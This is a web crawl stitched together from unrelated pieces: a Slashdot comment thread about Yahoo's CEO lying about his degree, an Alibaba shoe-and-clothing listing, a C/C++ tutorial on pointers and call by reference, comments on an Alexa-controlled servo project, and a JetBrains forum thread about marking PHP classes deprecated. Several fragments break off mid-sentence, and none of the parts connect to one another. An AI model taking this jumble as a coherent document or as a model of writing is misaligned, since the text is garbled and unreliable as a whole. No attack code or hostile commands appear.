only commits those who receive it... Re: (Score:2) A boss whose company is being acquired is often given a bribe ("retention bonus") to lie to his employees about what he knows and what is going to happen for a long per Re: (Score:3) While the line isn't always clear, in general it's NOT OK to lie on resume to obtain a job or gain advancement I cry bogus. When the economy results in 100 fully qualified applicants for each job, the only way to rise to the top of the resume pile is to lie. Therefore most hired by resume and resume filtration are liars, or at least the percentage of liars is spectacularly high, or honest people are dramatically underemployed. I've gotten all my jobs since 1995 thru "knowing people" and "having heard about me" so I haven't had to lie, I've got no dog in the fight so I can be honest about the situation. A good resu Re: (Score:3) Now, I trust references from trusted sources first, things I learn from an interview second, and never trust a resume. It's a huge pain in the ass Re: (Score:2) Proof of a degree? What company do you work for? I have never applied for a job that required proof of my degree. Engineers depend on truth (Score:4, Informative) Yes, we can be a bit literal minded. But we depend on knowing the straight dope to do our jobs ; our core competencies are founded on the ability to employ facts that we know to be, well, factual. Hence it's not really a surprise to find that we don't like people lying. It unsettles us. It's like some ghastly evil magic, the ability to blithely say things that aren't true without suffering any kind of stress reaction at all. Even that thing that management do where they misunderstand what you are saying about the capabilities of a technology and misrepresent it in a meeting brings us out in hives. Discovering that they are doing it on purpose really offends us. Re:Engineers depend on truth (Score:5, Insightful) It also offends us greatly when somebody is claiming to be an engineer that really is not. It demeans us and means our skills are arbitrary and that anybody can claim them without verification and consequences. This cannot be allowed to stand. Re: (Score:2) It also offends us greatly when somebody is claiming to be an engineer that really is not. It demeans us and means our skills are arbitrary and that anybody can claim them without verification and consequences. Isn't it actually illegal in the US to claim to be an engineer and practice engineering without a degree or certification? Hmmm (Score:3) So it's acceptable for people to lie if they are important? I suppose paying a small fine for doing unethical actions purify the actions somehow. Society seems to accept this and society is always correct so those that don't agree are big dodo heads and totally unreasonable. Lying's okay... as long as you're punished for it (Score:5, Interesting) Paraphrasing the article: "Google lied ... and paid $500M when they got caught" ... and settled with the FTC when they got caught" ... so just leave him alone, people!" "Facebook lied "Scott Thompson lied Re: (Score:2) The difference though is in the target of the lie. - Good: When you lie to the SEC or another company, that's just being a good businessman and valued member of your own corporation. - Bad: However lying to your boss and your shareholders means you're not to be trusted with the position you hold. Re: (Score:3) You do all understand, I hope, that Lyons is himself hardly the picture of virtue. This is a guy who gave SCO a free ride for years and even when he finally forced to admit he'd been wrong, still managed to blame Linux supporters for the whole thing. did he look like this when he said that? (Score:2) Leave $name alone! (Score:2) I assume that's the "Leave Britney Alone" guy...I was amused by the pun in the /. article title... Lying about accomplishments disqualifies him (Score:5, Insightful) There are a few things that lying about is completely unacceptable and disqualifies you as a member of civilized society. Education is the most important. All those that now protect Thompson do not seem to get it. My guess would be quite often due to a lack of education and in some cases certainly because they have done the same. If lying about degrees suddenly becomes acceptable, everybody will do it and degrees become meaningless. As degrees do not only provide the degree itself, but specific skills, knowledge and insights, if degrees become meaningless, incompetence in critical positions will raise. The second thing is that lying about a degree speaks volumes about the personality and character of the person doing it. It speaks of somebody that claims to be something he is not. It speaks of ambition without skill. It makes it highly likely he lied and continues to lie in other regards and that he is a generally dishonest person, at least whenever he thinks he can get away with it. As to the matter in detail, yes, even an old CS degree matters very much. It gives a different perspective on a number of things that have not changed at all. Details may have changed, but the fundamental issues are still the same, and this person does not have the skills to assess them. You cannot go from nothing to master just watching these things from the outside. You have to have hands-on experience and a CS degree provides that. For these reasons, Thompson must step down and his career must be over. Otherwise we will get even more dishonest and incompetent (but power-hungry) people in comparable positions. Re: (Score:3) Otherwise we will get even more dishonest and incompetent (but power-hungry) people in comparable positions. Too late. The psychopaths have been driving the bus for most of the latter 20th century. The 21st version is all about 'coming out' and eliminating the legal obstacles for corp gluttony and fascism, it seems. Re: (Score:2) Even a college degree is a real accomplishment and anybody claiming one without having one is scum. I do not have one, but a few other degrees. That would not make me trample over people's college degrees though. As to the ad hominem argument: It is the mark of a small mind. Goes well with being an Anonymous Coward. Summary hole (Score:5, Informative) The summary missed perhaps the most interesting part of the article:. The point being that everyone is dishonest, and while this guy got caught in a particularly clear-cut case of dishonesty, it's not very important, and it's not at all as bad as what the guy who accused him is doing. I agree with him there. The only thing I wonder about is the intelligence of a guy who felt the need to lie about his degree when it matters so little given his work experience and which can easily be checked. Sadly I question the competence of a CEO who can't lie well. Maybe that's what the board is really investigating. Re:Summary hole (Score:5, Insightful) A little reality check I occasionally give to students: Outside of academia, the only people who will ever sincerely care what your major was in college (and especially your minor) are the people who hire you for your first job. At that point in your career, your major and the grades you got in those classes are all you have going for you, so it's the only basis they have for judging you. But when you apply for your second job, all they will care about was your performance at your current/previous job, and maybe what kind of grades you got in college. "You've got a BA in English Literature, but you've spent the last two years writing binary control code for moisture vaporators? Welcome to Hutt Engineering." Third job and onward: it's 100% about your work experience. So it isn't worth lying about, and it isn't worth the petty outrage over it. Re: (Score:2) and western culture seems to revel in tearing down anyone successful for the most pety things nah, this is just an affectation from people on the left. Red necks compare the size of their gun collections, holier-than-thou leftists compare the size of their outrage to minor social transgressions, as in: - What, you used the word "seminal"? aren't you aware of its 5th century B.C. possibly sexist origins?? Shame on you! - Oh yeah? Well I think he should resign. - Well, I think he should resign _and_ all his writin Re: (Score:2) The only thing I wonder about is the intelligence of a guy who felt the need to lie about his degree when it matters so little given his work experience and which can easily be checked. That's the problem with lies - you get caught in them. It would certainly have mattered a lot when he was first in the industry. After that, when do you suddenly drop it? Once he was well-known, that background would have become attached to him and it would have been impossible to drop quietly without something public. Re: (Score:2) Not everyone is dishonest. Far from it. I know very few people who lie other than the ever popular white-lie answers to loaded questions like "does this outfit make me look fat?" I agree that the fellow making the issue over the lie on the resume has a motivation for doing so. It's good to know that his motivation is control of the company rather than vengeful destruction of someone's career just for the sake of making their lives miserable. Yahoo has been struggling. Everyone knows that. It seems p Re: (Score:2) Digging up dirt on a guy you want to see gone and then publicly posting it on the internet while posing as the good guy who's just fighting for the truth (as opposed to a shareholder with a personal stake in things) is worse in my book than lying about your college major after graduating decades ago and leading another tech company in the meantime. I'd like to say I don't necessarily believe TFA's version of events, at least not without a second source corroborating it and Loeb getting a chance to have his s Re: (Score:2) Why does he need to disclose he is a shareholder when publicizing a lie the CEO told about his resume? Either the CEO does or does not have the CS degree. If a major shareholder wants him gone that much, it seems like a good idea that he should be gone. Same standards for everyone is what's at stake (Score:2) What's at stake here isn't whether his lack of a degree matters or whether this is one of those innocent embellishments. We shouldn't let ourselves be lulled into a debate over what we think the real issues are -- the same standards and punishments should be applied to this CEO as would be applied to any other employee in the organization. There shouldn't be a double standard for this guy just because he's the CEO. Bill Clinton Lied (Score:2) and only the republicans seemed to care about that one.. no pass for Thomson or Jobs (Score:3) Leave Scott Thompson alone? No! And Steve Jobs is not the greatest CEO ever. What a sorry, pathetic apologist Mr. Lyons is being! Does he like Lloyd Blankfein, Tony Hayward, Angelo Mozilo, Dick Fuld, Brian Moynihan, Ken Lewis, and Ken Lay too? Stop being bedazzled by wealth and power, and not caring whether it was ill gotten! Too many people still venerate them, even now, when memories of the most recent disaster perpetrated by our wealthy elite should still be fresh. It's dangerous. Are honest people all idiots, chumps, dupes, and mushrooms? What kind of world does Lyons want for us all? We think that little of CEOs? (Score:2) So if I read this correctly, we're now at the point where our collective opinion of CEOs is so low that any standard of behavior above "didn't go on a shooting spree" is considered acceptable? Sorry, but no. We should expect at least out of our so-called "leaders" what we expect out of entry level staff or unpaid interns. That many CEOs are too morally bankrupt to meet that standard doesn't mean we lower it. Dear mr. Lyons, (Score:2) Dear mr. Lyons, Just because they all lie, doesn't make it okay for any single one of them to lie. Lousy kids (Score:2) "But mooooooooooooooooooommmmmmmmm! They did it fiiiiirssssst!" Re: (Score:2) The "He started it" line is often an attempt to whine about others getting away with something you get stuck being punished for. A quick look at the ethical fallacy scoreboard... (Score:3) Really, if you have to use fallacies to support your position, is your position actually really a sustainable one? Re: (Score:2) Re: (Score:3) "slight exaggeration" is already dishonest and means you are lying scum. Claiming a multi-year degree is not "slightly exaggerating" though. I do not know about the US, but in Europe, this is criminal and can get you fined. There are some multiple offenders (on PhD-level though) that have been sent to prison. In any case, this is grounds for immediate termination. Re: (Score:2) Let those whose resumés are a frankly honest documentation of their job histories, and those who have not put any "spin" on the reasons for leaving previous jobs... throw the first stones. Re: (Score:2) Okay. Are you volunteering as the first target? Re: (Score:2) I don't have to, darling. Re: (Score:2) I don't have to exaggerate my achievements and responsibilities. But I have claimed 'diplomacy' among my skills. Which is true in a sense. I no longer tell Chinese PhDs their projects would get failing grades in undergraduate data structures courses (especially when it's true). A resume is a marketing document. Positive spin is expected. Lying no. Slight exaggeration? Re: (Score:2) Re: (Score:2) This kerfuffle is about someone wanting to be on the board, and that person manipulating hatred of dishonesty to try and get what he wants
http://tech.slashdot.org/story/12/05/06/024254/leave-yahoo-ceo-scott-thompson-alone
CC-MAIN-2015-06
refinedweb
6,817
70.84
CE Rohs Light Up Shoes Accessories Rope Lights 3V Led Strip For Shoes / Clothes US $10.2-11 / Piece 50 Pieces (Min. Order) 2016 New Arrival Comfortable Handmade Soft Sole Casual Men Shoes summer kids clothes US $6-8 / Pair 800 Pairs (Min. Order) Cool shoes with led lights adult led rope lights for shoes/clothes US $10-15 / Pair 1 Pair (Min. Order) wears and shoes clothes and shoes EU popular shoes US $7.4-8.8 / Pair 100 Pairs (Min. Order) Cool shoes with led lights adult led rope lights for shoes/clothes US $8.5-12.5 / Pair 1000 Pairs (Min. Order) Top quality pretty ladies shoes match bag to match clothes for party US $10-50 / Set 1 Set (Min. Order) Pure manual Formal clothes Men's shoes manually change color US $138-198 / Pair 50 Pairs (Min. Order) Newest Glow led waterproof shoe lights for shoes clothes wholesale for party events US $12.0-12.0 / Piece | Buy Now 50 Pieces (Min. Order) Newest styles match any clothes and bags for loafer women shoes US $5-10 / Pair 500 Pairs (Min. Order) Nigeria CSB5136 GREEN Shoes and bag Wholesale African Low heel shoes and bag for match clothes US $30-45 / Set 1 Set (Min. Order) import costumes from china clothes business in china US $6.0-6.5 / Pairs 500 Pairs (Min. Order) Fashion Handmade Sandals Doll Clothes Accessories Clothes 18 Inch Doll Accessories American Girl Doll Shoes US $1-1.5 / Piece 100000 Pieces (Min. Order) skater clothes US $10-13 / Pair 300 Pairs (Min. Order) Pola Beauty Shose Factory lady clothes fashion 2014 PY2546 US $7-18 / Pair 20 Pairs (Min. Order) 2015 second hand clothes and shoes,flashing skate roller,adult roller shoes US $3-6 / Pair 1500 Pairs (Min. Order) lady shoes,Leisure, noble and generous, it is easy to match clothes US $9.08-10.08 / Pair 600 Pairs (Min. Order) italian ladies shoes with stones and matching bags to match clothes dress US $51-52 / Yard 1 Pair (Min. Order) top quality childrens ice skates, boys ice skates, ice skating clothes US $15-20 / Pair 500 Pairs (Min. Order) Aidocrystal Gold yellow latested women shoes and bag to match clothes US $38-108 / Pair 1 Pair (Min. Order) 2015 Latest design fashion china kids shoes for dress clothes US $9.83-10.83 / Pair 50 Pairs (Min. Order) High Quality Man Clothes And Shoes US $6.8-8 / Pair 120 Pairs (Min. Order) 2017 spring man casual sport shoes casual sport sneaker shoes casual trainning shoes US $13.5-15.0 / Pairs 10 Pairs (Min. Order) Hot selling lower price female casual shoe,available size in 36-41# sizes US $6.3-6.55 / Pairs 300 Pairs (Min. Order) Handmade mexico crocodile men leather dress shoes wholesale US $15-52 / Pair 1 Pair (Min. Order) 2016 Best Cheap Waterproof Hiking Shoes Men US $20.46-37.18 / Piece 1 Piece (Min. Order) cheap lasdies mens children sport work used second hand shoes US $0.8-1.5 / Kilogram 1 Ton (Min. Order) Cleanroom/Hospital/lab antistatic esd shoes US $2.9-2.9 / Pairs 100 Pairs (Min. Order) Diving barefoot Beach Walking Sock Like Shoes US $3.5-5.8 / Pairs 10 Pairs (Min. Order) GZY 125 a lot of basket shoes basketball US $3.99-4.99 / Pair 1000 Pairs (Min. Order) High Quality Clothing non - slip strong child jelly pvc sandals shoes US $0.96-1.03 / Pair 1 Pair (Min. Order) 2015 cheap running shoes hot selling wholesale New sport shoes dropship brand name running shoes US $5-13 / Pair 1 Pair (Min. Order) Z88628A alibaba china footwear children kids clothes girls shoe boys canvas shoe US $3.05-11.9 / Piece 10 Pieces (Min. Order) Buying Request Hub Haven't found the right supplier yet ? Let matching verified suppliers find you. Get Quotation NowFREE Do you want to show shoes clothes or other products of your own company? Display your Products FREE now! Related Category Product Features Supplier Features Supplier Types Recommendation for you related suppliers related Guide related from other country
http://www.alibaba.com/countrysearch/CN/shoes-clothes.html
CC-MAIN-2017-04
refinedweb
688
85.59
A cryptographic hash function implemented using SHA1. More... #include <Wt/Auth/HashFunction.h> A cryptographic hash function implemented using SHA1. This hash function is only available if Wt was compiled with OpenSSL support. This hash function is useful for creating token hashes, but should not be used for password hashes. Computes the hash of a message + salt. The message is usually an ASCII or UTF-8 string. The salt and the computed hash are encoded in printable characters. This is usually ASCII-encoded (as for the UNIX crypt() functions) or could be Base64-encoded. Implements Wt::Auth::HashFunction. Returns the name for this hash function. Returns "SHA1". Implements Wt::Auth::HashFunction.
http://www.webtoolkit.eu/wt/doc/reference/html/classWt_1_1Auth_1_1SHA1HashFunction.html
CC-MAIN-2017-51
refinedweb
111
51.65
1. ) What do you mean by call-back method?A delegate in c# is a class type object that is used to encapsulate the method call and invoke a method at the time of its creation.? 3. ) What are the main purpose to use the delegate objects? - Callback - Event Handling 4. ) What are class used for delegate declaration? System.Delegate 5. ) What is delegate in c# ? Delegate means "a person acting for another person" or "a method acting for another method". 6. ) What are the steps involved for creating a delegate ? - Delegate declaration - Delegate method definition - Delegate object declaration - Delegate invocation(calling) 7. ) Through delegate only that function can be called whose signature and Return type is same as delegate ?True More Details.. 8. ) What is the syntax for declaration of the delegate ? <access-specifier><delegate keyword><return type><delegate-name><parameter-list> Ex. public delegate void del(); 9. ) What are the modifier(access-specifier) used to control the accessibility of the delegate ? - Public - protected - internal - private - New Note:-The new modifier is only used on delegates declared within another type. 10. ) Where we can define the delegates ? - Inside a class - outside the class - As a top level object in a namespace Sealed. 12. ) What is delegate method and how to declare it ? A method whose references is encapsulated into a delegate instance is known as delegate methods. OR A method which will be called by the delegate ,is known as delegate methods. Ex. public class student { public void show() { messageBox.show("Hello Friends"); } } 13. ) What is the delegate object declaration in c# ? We have already seen,a delegate is a class type and behave like a class. Syntax:- delegate-name delegate-object = new delegate-name(expression) Ex. student obj =new student(); del delobj =new del(obj.show); 14. ) What is the delegate invocation in c# ? Syntax:- Ex delobj(); 15. ) What are the types of delegates in c# ? There are two types of delegate in c #. - Single cast delegate - Double cast delegate One delegate object can call only one method, is known as single cast delegate. 17. ) What is the multi cast delegate in c# ? One delegate object can call more than one method in sequence ,is known as multicast delegate. 18. ) What is the anonymous method in context of delegate? The collection of methods directly pass the delegate,is known as anonymous method. More Details.. 19. ) What is event in c#? A Event is a kind of notification(information) giving one by one object to another object to perform task. More Details.. 20. ) What is the syntax of event declaration ? <access-specifier><Event-keyword><Delegate-name><Event-name> Ex. public event del myevent; More Details.. 21. ) What is the Event handler in c# ? Event handler is a method which is used for handling the events. 22. ) Are events are fully based on the delegates ? Yes.We can not handle the events without delegates
https://www.msdotnet.co.in/2013/09/delegates-and-events-questions-and.html
CC-MAIN-2021-04
refinedweb
484
61.02
Police Sirens and Frequency Modulation Police Sirens and Frequency Modulation Ah, the allure of the police siren call! Have you ever wondered how they sing their magical song? Join the DZone community and get the full member experience.Join For Free Jumpstart your Angular applications with Indigo.Design, a unified platform for visual design, UX prototyping, code generation, and app development. Yesterday, I was looking into calculating fluctuation strength and playing around with some examples. Along the way, I discovered how to create files that sound like police sirens. These are sounds with high fluctuation strength. The Python code below starts with a carrier wave at fc = 1500 Hz. Not surprisingly, this frequency is near where hearing is most sensitive. Then this signal is modulated with a signal with frequency fm. This frequency determines the frequency of the fluctuations. The slower example produced by the code below sounds like a police siren. The faster example makes me think more of an ambulance or fire truck. Next time I hear an emergency vehicle, I’ll pay more attention. If you use a larger value of the modulation index β and a smaller value of the modulation frequency fm, you can make a sound like someone tuning a radio, which is no coincidence. Here are the output audio files in .wav format: slow.wav, fast.wav from scipy.io.wavfile import write from numpy import arange, pi, sin def f(t, f_c, f_m, beta): # t = time # f_c = carrier frequency # f_m = modulation frequency # beta = modulation index return sin(2*pi*f_c*t - beta*sin(2*f_m*pi*t)) def to_integer(signal): # Take samples in [-1, 1] and scale to 16-bit integers, # values between -2^15 and 2^15 - 1. return int16(data*(2**15 - 1)) N = 48000 # samples per second x = arange(3*N) # three seconds of audio data = f(x/N, 1500, 2, 100) write("slow.wav", N, to_integer(data)) data = f(x/N, 1500, 8, 100) write("fast.wav", N, to_integer(data)) Related Posts Take a look at an Indigo.Design sample application to learn more about how apps are created with design to code software. Published at DZone with permission of John Cook . See the original article here. Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/police-sirens-and-frequency-modulation
CC-MAIN-2019-04
refinedweb
389
58.48
On Oct 21, 3:47 pm, Carl Banks <pavlovevide... at gmail.com> wrote: > On Oct 21, 11:09 am, Brendan <brendandetra... at yahoo.com> wrote: > > > > > > > Two modules: > > x.py: > > class x(object): > > pass > > > y.py: > > from x import x > > class y(x): > > pass > > > Now from the python command line:>>> import y > > >>> dir(y) > > > ['__builtins__', '__doc__', '__file__', '__name__', '__package__', > > 'x', 'y'] > > > I do not understand why class 'x' shows up here. > > Because you imported it into the namespace, which is what the import > statement does. dir() shows you what's in the namesace; therefore it > lists x. dir() doesn't care, and can't know, if something was defined > in a namespace, or merely imported. > > If it bothers you, you can put "del x" after the class y definition, > but I recommend against doing that in general. If there's a reference > to x inside a function that function will raise an exception if > called, because it expects x to be inside the namespace. > > Carl Banks- Hide quoted text - > > - Show quoted text - So it must never make sense to put subclasses in separate modules?
https://mail.python.org/pipermail/python-list/2010-October/590308.html
CC-MAIN-2017-17
refinedweb
183
72.66
Hi Guys, I've build a LAB to play with the DFS and replications and the permissions. i've created a namespace call it Data so i can access it with \\server\data Now i've created a Folder Sales on the Data folder. i see i can only manage the NTFS permission using the Windows Folder Permission and not through the DFS. is this even possible to manage all permissions on the folder using DFS management ? or i have to create for each Deperatements a DFS Namespace ? thank you guys 2 Replies · · · Nov 17, 2016 at 2:30 UTC DFS is all about providing a central point for users to access data. It's not about permissions for that data as this is still taken care of at the file system level. 0 · · · Nov 17, 2016 at 4:27 UTC Thank you, just found some interessting videos online , Icompletely understand the DFS now, big thank you guys 0
https://community.spiceworks.com/topic/1926221-dfs-ntfs-permissions
CC-MAIN-2017-43
refinedweb
159
69.11
In this tutorial about pointers in C/C++ programs, we will learn how to use pointers as function arguments or function call by reference in C/C++. This is one of the use cases for pointer variables also known as call by reference. Pointers as Function Arguments Before diving straight into the topic first let us look at an example C program involving a user defined function. The aim of this program was to decrement the integer variable ‘x’ using the user defined function void decrement(). #include <stdio.h> void decrement(int x) { x = x - 1; } int main(){ int x; x=100; decrement(x); printf("x = %d", x); } How the Code Works? As you can see the integer variable ‘x’ is declared and initialized to 100 in the main() method. The purpose was to decrement the value of the variable ‘x’ by one. Instead of specifying x =x -1 in the main(), the decrement() function was used instead. int main(){ int x; x=100; decrement(x); printf("x = %d", x); } decrement() is a user defined function that takes in the integer variable ‘x’ as an argument and decrements its value by 1. void decrement(int x) { x = x - 1; } This function is called inside the main() with ‘x’ as the argument. Then, the value of ‘x’ is printed as an output. printf("x = %d", x); The person who wrote this piece of sketch expects that the value of ‘x’ will be decremented by 1 and will thus be (100-1) 99. Let us see if this is the case or not. Code Output Now let’s see the code output. After the compilation of the above code, you will get this output. As you can see the value of x is still 100 which was the value it was initialized with. It did not decrement. Let us see why this happened and how to resolve it? Problem with the Code The issue with the above program code is that the integer variable ‘x’ is not being accessed properly. Whenever we declare a variable inside a function it is called a local variable. By using the variable name we can access that variable only in the same function in which we have declared it. Thus, the variable ‘x’ in the function decrement() and the variable ‘x’ in the main() are not the same variables! When main() calls the decrement() method and passes the ‘x’ as an argument to the function then only the value of x is copied to this another x which is another variable local to the decrement() function. Let us modify this code to show you what is happening by adding two print statements. One print statement is added in the decrement() function to print the address of the variable ‘x.’ Likewise, another print statement is added in the main() to print the address of the variable ‘x’ present in the main(). Remember to access the address of a variable, we add ‘&’ in front of the variable. #include <stdio.h> void decrement(int x) { x = x - 1; printf("Address of 'x' in decrement() = %d\n", &x); } int main(){ int x; x=100; decrement(x); printf("Address of 'x' in main() = %d\n", &x); //printf("x = %d", x); } Code Output Now let’s see the code output. After the compilation of the above code, you will get this output. Notice that the addresses are different for the variable ‘x’ in decrement() and main() showing that it is indeed two variables and not the same. If the variable ‘x’ in decrement() and main() was same then the addresses would have been the same as well. Application Memory To understand this better, let us see what happens in a computer’s memory when a program executes. When an application is started, the computer sets aside some amount of memory for the execution of the program. This memory is divided into four categories as shown in the diagram below. One part of memory is allocated to store the various instructions in the program (code). The computer needs to keep all its instructions in the memory e.g. sequential instructions. Another part of the allocated memory is for the global variables. If we do not declare a variable inside a function in C/C++ then it is known as a global variable. Global variables can be accessed and modified anywhere in the program unlike local variables which can be accessed and modified within a particular function/ code block. The third part of the memory is called stack. This is a very important segment for this guide. This is where all the local variables are stored. The fourth part is the heap which we will discuss in later guides. Of these four sections of the allocated memory: the code segment, the global variables and the stack are fixed. They are decided when a program starts executing. The application can however ask for more memory for heap section during execution. RAM Let us show you the computer RAM when a program executes. Each byte in the memory is addressable. Lets say the memory allocated for our program is from 200-900 with various segments of our application’s memory. Now for e.g. address 400-700 is allocated for STACK. From 400-700 this part of the memory is assigned for our program as shown below: For example purposes, we will use the program code that we specified in the first section. #include <stdio.h> void decrement(int x) { x = x - 1; } int main(){ int x; x=100; decrement(x); printf("x = %d", x); } When the program starts the main() method is initially invoked. All the information about the method call for example parameters, local variables, the calling function to which it should return, the current instruction at which it is executing basically all this information is stored in the STACK. Stack Frame We will take out from the stack some part for the main() method and create a unit called stack frame. Each function will have stack frame associated with it. Inside this stack frame we have our variable ‘x.’ Memory is allocated for x from this stack frame and its value is set to 100. Calling decrement() in main() Additionally, the main() method also calls decrement() function. What happens then? The machine stops the execution for some time. It goes ahead and finishes the decrement() method first and then it resumes back to the main() method. Thus, another stack frame is allocated, this time for the decrement() function with the parameters of the decrement() function like ‘x’. New local variables are created corresponding to these parameters. Whatever values have been passed are copied to these variables as well. Now inside the decrement() function the following statement x =x-1 is executed. What happens is that this ‘x’ which is local to this particular decrement() function, in this particular stack frame, this ‘x’ is decremented by 1 as shown below. Note that we can not access this variable outside its stack frame. When decrement() finishes the control returns to the main() method. The machine clears the stack frame that was allocated for decrement(). Main() method resumes again which was paused before. Thus, the life time of a local variable is only till the time the function is executing. Now, the next statement in the main() function is printf(). The state of execution of main method is paused and printf executes. This particular structure is known as function call stack. Whichever function is at the top of this stack executes. Remember the stack is fixed in size so if you have a scenario where one function keeps calling another function indefinitely then the memory of the stack will overflow. Hence, the program will crash. Call by Value Let us look at our decrement() function. Here ‘x’ is in the stack frame of the main() method. void decrement(int x) { x = x - 1; } The main() is our calling function and decrement() is our called function. When we call a function in the calling function, the argument is also known as ‘actual argument.’ In the called function, the argument is known as ‘formal argument.’ All that happens is that the actual argument is actually mapped to a formal argument. So when this function call happens, ‘x’ as an actual argument is mapped to another ‘x’ which is a formal argument. Instead of ‘x’ if had a ‘y’ here, then we would have written the decrement function as shown below: void decrement(int y) { y = y - 1; } In this case ‘x’ would have mapped to ‘y’. So the value of ‘x’ will be copied to the variable ‘y.’ Now if we make such a function call, we basically have a variable we map to another variable, the value in one variable copied to another variable then such a function call is called CALL BY VALUE. This was what was happening in the initial sketch. A call by value was being made that is why the desired result was not obtained. Now how to get the desired result? Let us look into that. Call by Reference We want to use the variable ‘x’ local to the main() method inside the decrement() function. This will be done if we use pointers as function arguments. We have modified the initial code below to give the desired outcome. Let us look into it. #include <stdio.h> void decrement(int *ptr) { *ptr = *ptr - 1; } int main(){ int x; x=100; decrement(&x); printf("x = %d", x); } Notice that the decrement() function’s argument is not an integer variable anymore. In fact the argument is a pointer to an integer. As you already known, pointer to integer is used to store the address of the integer. In the decrement() function, we ware passing the address of ‘x’ as &x. When the program will execute, the main() method will be invoked first. For example let us say that the stack shown below corresponds to this program sketch. The stack frame of the main() method has address from 400-500. Now there will be a local variable ‘x’ in this main() method. The address at which ‘x’ is stored is 450 and the value stored in it is 100. When main() method calls decrement(), then a local variable corresponding to the parameter ‘ptr’ is created. This is a pointer to integer and the value that is passed to this variable will be 450 (the address of x). Thus, ptr is pointing to x. Now when we say *ptr we are dereferencing this address. The following statement in the decrement() function : *ptr = * ptr – 1 means that *ptr is the value stored at the address ptr decremented by 1. Hence, (100-1=99) So ‘x’ is now 99. When decrement() finishes and we come back to the main() method. The print statement gets executed. As x is now 99 thus this is the output that will be printed. Now let’s see the code output. After the compilation of the above code, you will get this output. Dynamic Memory Allocation through Double Pointer and Function ; } Points to Note A function call in which instead of passing the value of a variable we pass the address of the variable so that we have a reference to the variable and we can dereference it and perform some operations is called call by reference. So if we use pointers as functions arguments then we are using call by reference. Call by reference can save us a lot of memory because instead of creating a copy of a large and complex data type we just use the reference to it. Using a reference will make our program code efficient and lead to less memory consumption. You may also like to read: - Function Pointers in C/C++ and Function Callbacks - C Program to change Endianness of data and bytes swapping example using Pointers - How to find an array size without using sizeof() and through Pointers Subtraction - Pointer Arithmetic, Pointer Size, and Pointer Type in C and C++ - C program to Reverse an Integer Number/ Program for Reverse Number in C - How to find the Size of structure without sizeof() Operator? - Dynamic Memory Allocation through Double Pointer and Function without returning address - Returning multiple values from a function
https://csgeekshub.com/c-programming/pointers-as-function-arguments-or-call-by-reference/
CC-MAIN-2021-49
refinedweb
2,044
71.85
. Attachments: Participated in the Arduino Contest 2017 Be the First to Share Recommendations 24 Discussions Question 1 year ago Hi, i´ve built this all, even when i run the code and check it in the serial monitor it says:"Connected to WiFi". But i cannot discover the device in alexa app. Can anyone help? Answer 3 months ago i got the same problem and i found that first we have to enable wemo skill in alexa app. but in my alexa app its not showing.you can try this if its there. if you got any another way plz inform me Reply 1 year ago As I noted all I had to do was say "Alexa discover devices" and "keyboard" was found - not sure what may up with your implementation. Keep at it and I am sure you will get it! dave Question 10 months ago on Introduction This is not a question but to let you know that one of those blinking LED's with built in blink circuit and resistor for 5v works great for keeping computer alive. Put it in a box with led barely sticking out and set mouse on top of it centered with mouse's LED. The mouse curser will start moving over to side and stay there and computer will not go to screen saver or asleep. Answer 10 months ago I didn't know that would work but it makes sense - I could have set the laptop to never blank the screen, too, but wanted it to sleep when I wasn't in my office. thanks for the info dave 1 year ago To those that can't discover their device with Alexa: As I mentioned in reply to a comment below,. You'll need to add in your API key, Wifi SSID and password, and device ID. 1 year ago Does anyone try with Alexa echo dot 3rd generation? Alexa does not find the device Reply 1 year ago It seems. Reply 1 year ago I cannot thank you enough for this code. Thumbs up all around! Question 2 years ago on Step 8 How do you download all the missing libraries. I really don't know what I'm doing, here's the error message. Plz help: Arduino: 1.8.5 (Windows 10), Board: "LOLIN(WEMOS) D1 R2 & mini, 80 MHz, Flash, 4M (1M SPIFFS), v2 Lower Memory, Disabled, None, Only Sketch, 921600" Build options changed, rebuilding all C:\Users\Bhanger Bhanger\AppData\Local\Temp\Rar$DIa0.713\Wemos-Servo-keyboard\Wemos-Servo-keyboard.ino:22:20: fatal error: switch.h: No such file or directory #include "switch.h" ^ compilation terminated. Multiple libraries were found for "Servo.h" Used: C:\Users\Bhanger Bhanger\AppData\Local\Arduino15\packages\esp8266\hardware\esp8266\2.4.2\libraries\Servo Not used: C:\Program Files (x86)\Arduino\libraries\Servo exit status 1 Error compiling for board LOLIN(WEMOS) D1 R2 & mini. This report would have more information with "Show verbose output during compilation" option enabled in File -> Preferences. Reply 2 years ago This Instructable... should help with the libraries - if you have never installed libraries with the Arduino see: Hope that helps dave 2 years ago Thanks for your help-- I was able to take your instructable and morph it to do what I needed. I was very excited to discover this :) Reply 2 years ago That is great news - thanks for letting me know dave 2 years ago. Reply 2 years ago 2 years ago I thought of another thing I want to do with this. Here is an older post of mine that after looking at this project, I hope I can upgrade my project ...... 2 years ago Why did you use GPIO14 for the servo? I'm starting on this exact circuit for another project and was going to try GPIO2 so it's closer to power. Reply 2 years ago No particular reason - the sketch should work on any of the other GPIO pins dave Reply 2 years ago? Reply 2 years ago I got it working. I updated the code from the original author.
https://www.instructables.com/Alexa-Controlled-Servo/
CC-MAIN-2020-50
refinedweb
685
72.05
I would like to mark whole directories/namespaces as deprecated. Because of our saas-applications we have multiple versions which need to stay online, until nobody needs it anymore. Our namespace/directories are like: - module\v100 - module\v102 - module\v201 etc. Inside an 'older' directory all files have to be marked as deprecated. So we put a `@deprecated` tag (with timestamp and info) in the doc-block of the classes, traits, etc. I have a regexp (from our netbeans time) for replace in directories to do this a bit automated. ([\r\n]\h*\*)(\/[\r\n]+(\h*(abstract|static))?\h*(class|trait|interface)) replace with: $1 \@deprecated since 20210722 version v3$1$2 But I hope there is a nicer and quicker way. nb. We are not on php8 yet :-(, so attributes is no option yet. Thanks in advance! flexJoly I am afraid there is no option to do that automagically. However, you may want to use the SSR (Structural search and replace), for example, to search for classes. Just in case, a little bit more about it: I did look to that, but can't get it to work. Search: filter for $doc$: replace with: The search goes well. But replace gives: :-( And this is only for a class.... but it should also find interfaces, traits etc. I read the documentation over and over again. Also tried for replacement: with script: Please help, thanks! Tried to play around with SSR but with no luck either :( (got to try it again later) Back to the original post, what seems to be a drawback from the Netbeans time regex replacement solution? thanks for trying!! The setback is that it is not saved like the SSR. And I hoped to find a nicer solution or maybe that phpStorm had a feature for this. I think I am not the only one, needing something like this.
https://intellij-support.jetbrains.com/hc/en-us/community/posts/4404145340050-How-to-add-deprecated-to-multiple-classes-files?page=1#community_comment_4404140699666
